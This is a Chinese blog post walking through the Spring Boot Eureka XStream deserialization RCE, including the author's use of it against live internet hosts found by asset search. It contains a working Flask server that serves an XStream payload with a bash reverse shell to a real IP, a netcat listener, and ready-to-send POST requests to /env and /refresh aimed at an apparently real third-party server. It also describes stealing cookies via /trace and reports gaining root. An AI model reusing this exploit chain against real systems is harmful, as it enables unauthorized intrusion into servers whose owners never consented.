SpringBoot-Eureka-xstream-rce漏洞复现

最新推荐文章于 2024-06-21 08:32:45 发布
最新推荐文章于 2024-06-21 08:32:45 发布
阅读量8.6k 收藏 8
点赞数 4
分类专栏: 从入门到入狱 文章标签: spring boot eureka java web安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/128041932
版权

SpringBoot-Eureka-xstream-rce

actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块。其提供的执行器端点分为两类:原生端点和用户自定义扩展端点,原生端点主要有:

在这里插入图片描述

漏洞利用

1.利用trace,获取认证信息(Cookie、tooken、Session),利用认证信息访问接口

http://localhost:9093/trace

访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等),如果存在登录用户的操作请求,可以伪造cookie进行登录。

在这里插入图片描述

2.利用env加refresh进行getshell

http://localhost:9093/env

访问/env端点获取全部环境属性,由于 actuator 会监控站点 mysql、mangodb 之类的数据库服务,所以通过监控信息有时可以mysql、mangodb 数据库信息,如果数据库正好开放在公网,那么造成的危害是巨大的

在这里插入图片描述

/env端点配置不当造成RCE

利用条件:

  • 可以 POST 请求目标网站的 /env 接口设置属性
  • 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
  • 目标使用的 eureka-client < 1.8.7(通常包含在 spring-cloud-starter-netflix-eureka-client 依赖中)
  • 目标可以请求攻击者的 HTTP 服务器(请求可出外网)

因为自己搭建的靶场环境一直复现失败,决定直接实战,搜索

app="Eureka-Server"

爬取ip,访问/env路径,若返回状态码为200则可能成功,可以写批量exp的脚本

接下来对我们搜集的ip测试是否出网

在这里插入图片描述

在这里插入图片描述

在refresh后,dnslog出现了一条数据,证明目标服务器可以出网,接下来进行漏洞利用,并记录详细过程
在这里插入图片描述

开启脚本,架设响应恶意 XStream payload 的网站,这里我使用了自己的云服务器

python springboot-xstream-rce.py

springboot-xstream-rce.py

from flask import Flask, Response

app = Flask(__name__)

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>', methods = ['GET', 'POST'])
def catch_all(path):
    xml = """<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                      <string>/bin/bash</string>
                      <string>-c</string>
                      <string>bash -i >&amp; /dev/tcp/124.222.155.84/3333 0>&amp;1</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>"""
    return Response(xml, mimetype='application/xml')
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=2222)

访问测试http://ip:2222/xstream ,返回一条数据

在这里插入图片描述

服务器监听反弹shell的端口

nc -lvvp 3333

在这里插入图片描述

1.eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址

spring1.x

POST /env HTTP/1.1
Host: 47.111.236.137:9001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

eureka.client.serviceUrl.defaultZone=http://124.222.155.84:2222/xstream

若spring2.x

POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/xstream"}

2.refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload

spring1.x

POST /refresh HTTP/1.1
Host: 47.111.236.137:9001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

aaa

在这里插入图片描述

spring2.x

POST /actuator/refresh
Content-Type: application/json

在这里插入图片描述

3.目标机器相关依赖解析 payload,触发 XStream 反序列化,造成 RCE 漏洞

等待一段时间直接拿到权限,控制了服务器还是root权限

在这里插入图片描述

tpaer
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全Spring Boot eureka xstream 反序列化
HBohan的博客
03-13 3531
EurekaSpring Cloud Netflix 模块的子模块,它是 Spring Cloud 对 Netflix Eureka 的二次封装,主要负责 Spring Cloud 的服务注册与发现功能,开发人员只需引入相关依赖和注解轻松将 Spring BootEureka 进行整合。
小心,别被eureka坑了
steven2xupt的博客
04-14 1359
Eureka是Netflix开发的服务发现框架,本身是一个基于REST的服务,主要用于定位运行在AWS域中的中间层服务,以达到负载均衡和中间层服务故障转移的目的。SpringCloud将它集成在其子项目spring-cloud-netflix中,以实现SpringCloud的服务发现功能。 Eureka包含两个组件:Eureka Server和Eureka Client。具体怎么部署这里就不说了,直接说问题 Eureka 客户端注册时需要配置服务端地址,类似如下配置 eureka: instance.
Java配置47-Spring Eureka 未授权访问漏洞修复
JustDI0209的博客
11-03 7820
Spring Security 5.7.0-M2 中,WebSecurityConfigurerAdapter 被弃用了,Spring 鼓励用户转向基于组件的安全配置。这是因为从 Spring Boot 2.0 开始,默认情况下会启用CSRF保护,以防止CSRF攻击应用程序,导致服务注册失败。实在没招了,只能怀疑用的框架版本太低,去重新整一个,eureka 就用了个服务发现,问题不大。刷新 eureka 页面,也没有服务信息,服务注册失败了。我试了几个方法,没有替换掉,靠你了,耿小姐。
Spring Boot集成xstream快速入门demo
最新发布
HBLOG
06-21 675
XStream 是一个简单的基于 Java 库,Java 对象序列化到 XML,反之亦然 (即:可以轻易的将 Java 对象和 xml 文档相互转换)。
小白实战 | spring Eureka Xstream Deserialization RCE 漏洞复现
伏一
05-21 669
Spring Eureka的版本升级到安全的版本,例如,如果你使用的是Spring Cloud版本,可以升级到最新的修复版本(例如,如果是Hoxton.SR10,那么应该升级到Hoxton.SR11或更高)。5.使用 python 在自己控制的服务器上运行以上的脚本,并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号,在修改完成就 启动脚本即可。4.利用目标<command></command>标签中攻击载荷达成反弹shell。2.python 脚本。1.访问网站服务器是否出网。
【转载】JAVA常用组件未授权漏洞解析
maoxiaotao的博客
02-04 811
java项目中,经常会使用一些监控类的组件来监控系统的状态,如果对这些组件没有做好权限控制,公网可以任意访问的话,就会泄露敏感信息,进一步造成更严重的危害。今天就来看一下,都有哪些组件。
spring eureka漏洞_Spring boot相关漏洞利用(1)
热门推荐
weixin_39690958的博客
12-09 1万+
Spring bootSpring 的一套快速配置脚手架,可以基于spring boot 快速开发单个微服务,Spring Boot,看名字就知道是Spring的引导,就是用于启动Spring的,使得Spring的学习和使用变得快速无痛。不仅适合替换原有的工程结构,更适合微服务开发。Spring Cloud基于Spring Boot,为微服务体系开发中的架构问题,提供了一整套的解决...
springboot-admin-server.zip
09-24
SpringBoot Admin 是一个用于监控和管理 Spring Boot 应用程序的工具,它的核心功能是提供一个用户友好的界面,展示应用程序的各种运行时信息,如健康状况、日志、指标、环境变量等。在这个名为 "springboot-admin-...
SpringBoot-Dubbo.zip
06-12
SpringBoot和Dubbo是两个在Java开发中广泛使用的框架,它们各自在不同的领域发挥着重要作用。SpringBoot简化了Spring框架的配置,使得快速构建和部署应用程序变得更加容易,而Dubbo则是一个高性能、轻量级的分布式...
springboot-cloud
10-15
而`eureka-client1`和`eureka-client2`则代表了微服务客户端,它们会向Eureka Server注册自身,并通过Eureka获取其他服务的位置信息,实现服务间的通信。 其次,`config-client`和`config-server`涉及的是Spring ...
Springboot-Microservice:Springboot-微服务
03-31
SpringBoot 微服务是现代Java开发中的一个关键概念,它基于Spring Boot框架,旨在简化创建独立、生产就绪的Spring应用程序。SpringBoot以其约定优于配置的特性,大大减少了初始化和配置工作,使得开发者可以更快地...
spring-boot-examples-master.zip_gas4w6_springboot-example
09-21
本压缩包"spring-boot-examples-master.zip_gas4w6_springboot-example"正是一个关于Spring Boot的实例集合,其中包含了多个实用的示例项目,旨在帮助开发者深入理解和应用Spring Boot。 1. **快速入门** Spring ...
SpringCloud Netflix:微服务,Eureka,Ribbon
燕双嘤
08-02 460
微服务架构风格是一种将一个单一应用程序开发为一组小型服务的方法,每个服务运行在自己的进程中,服务间通信采用轻量级通信机制(通常用HTTP资源API)。这些服务围绕业务能力构建并且可通过全自动部署机制独立部署。这些服务共用一个最小型的集中式的管理,服务可用不同的语言开发,使用不同的数据存储技术。........................
SpringCloud】集群下 Eureka 的启动 bug,大坑
Java攻城狮修炼中
05-01 1135
如题,笔者创建了两个 Eureka Server 做集群,并引入了 Spring Security 在启动这两个 Server 就出现错误,会有各种 bug,比如 There was a problem with the instance info replicator com.netflix.discovery.shared.transport.TransportException: Cannot execute request on any known server DiscoveryClient_E
SpringBoot Actuator RCE 漏洞总结
渗透测试研究中心
03-01 2983
一、SpringBoot env 获取* 敏感信息当我们直接访问 springboot 站点时,可以看到某些 password 字段填充了*通过${name} 可以获取明文字段 2. 配置不当导致敏感信息泄露(password 打星号,而 pwd 没有打星号)参考https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA具体实现过程:例如: 我...
SpringBoot漏洞大全
m0_67403188的博客
08-02 6812
前段时间做渗透发现了一个很眼熟的页面长这个样子页面log是去世界最大的同性交友网github.com搜了一下发现了一个十分详细的文章存在大量接口信息泄露成功交差。
Java第四十六天,SpringCloud框架系列(九),Eureka 问题修复
愿你饱经冷暖,仍保纯真
07-22 1246
Eureka 问题修复
Spring-boot远程代码执行系列(eureka xstream deserialization RCE
网络安全。
10-05 5797
0x1 漏洞原理 1.eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址。 2.refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload。 3.目标机器相关依赖解析 payload,触发 XStream 反序列化,造成 RCE 漏洞。 0x2 漏洞利用条件 1.可以 POST 请求目标网站的 /env 接口设置属性 2.可以 POST 请求目标网站的
Springboot远程代码执行(spring cloud SnakeYAML RCE
qq_50854662的博客
06-27 789
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE
spring-cloud-starter-eureka-server
03-31
Spring Cloud Starter Eureka Server is a starter dependency that provides the Eureka Server module of the Spring Cloud Netflix project. Eureka Server is a service registry that enables microservices to discover and communicate with each other. With Eureka, each microservice registers itself with the Eureka Server and queries the Eureka Server to find other microservices it depends on. The Spring Cloud Starter Eureka Server provides an easy way to set up an Eureka server instance in a Spring Boot application. It includes all the necessary dependencies and configuration to enable the Eureka Server and register services. To use Spring Cloud Starter Eureka Server, you can add the following dependency to your project: ``` <dependency> <groupId>org.springframework.cloud</groupId> <artifactId>spring-cloud-starter-netflix-eureka-server</artifactId> </dependency> ``` After adding the dependency, you can annotate your main Spring Boot application class with `@EnableEurekaServer` to enable the Eureka Server: ``` @SpringBootApplication @EnableEurekaServer public class EurekaServerApplication { public static void main(String[] args) { SpringApplication.run(EurekaServerApplication.class, args); } } ``` Once you have the Eureka Server set up, you can register microservices with it using the `@EnableDiscoveryClient` annotation in your microservice application. Overall, the Spring Cloud Starter Eureka Server provides an easy and efficient way to set up an Eureka Server in a Spring Boot application and enable microservice communication.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值